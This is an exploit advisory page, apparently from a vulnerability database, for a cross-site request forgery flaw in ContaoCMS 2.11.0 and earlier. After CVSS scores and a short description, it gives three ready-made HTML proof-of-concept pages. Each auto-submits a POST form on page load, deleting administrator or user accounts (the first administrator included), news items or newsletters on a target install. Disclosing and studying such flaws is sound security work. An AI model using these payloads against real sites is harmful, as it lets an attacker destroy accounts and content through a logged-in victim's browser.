ContaoCMS 2.11.0 Cross Site Request Forgery

2012-02-27 / 2012-03-21
Credit: Ivano Binetti
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

+--------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : ContaoCMS (fka TYPOlight) <= 2.11 CSRF (Delete Admin- Delete Article) # Date : 25-02-2012 # Author : Ivano Binetti ( # Software link : # Vendor site : # Version : 2.11.0 (latest) and lower # Tested on : Debian Squeeze (6.0) +--------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------[Multiple Vulnerabilities by Ivano Binetti]-------------------------------------------+ Summary 1)Introduction 2)Vulnerabilities Description 2.1 Delete Administrators or Users 2.2 Delete News 2.3 Delete Newsletter +--------------------------------------------------------------------------------------------------------------------------------+ 1)Introduction Contao (fka TYPOlight) is "an open source content management system (CMS) for people who want a professional internet presence that is easy to maintain". 2)Vulnerabilities Description Contao 2.11 (and lower) is affected by CSRF Vulnerability which allows an attacker to delete admins/users, delete web pages (articles, news, newsletter and so on). 2.1 Delete Administrators or Users <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to delete ADMIN/USER account</H2> <form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=user&act=delete&id=2"> </body> </html> Note that the is possible to delete any admin/user, also the first administrator (id=1) created during Contao's installation phase. 2.2 Delete News <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to delete News</H2> <form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=news&act=delete&id=1"> </form> </body> </html> 2.3 Delete Newsletter <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to delete Newsletter</H2> <form method="POST" name="form0" action="http://<contao_ip>:80/contao/contao/main.php?do=newsletter&act=delete&id=1"> </form> </body> </html> +--------------------------------------------------------------------------------------------------------------------------------+


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021,


Back to Top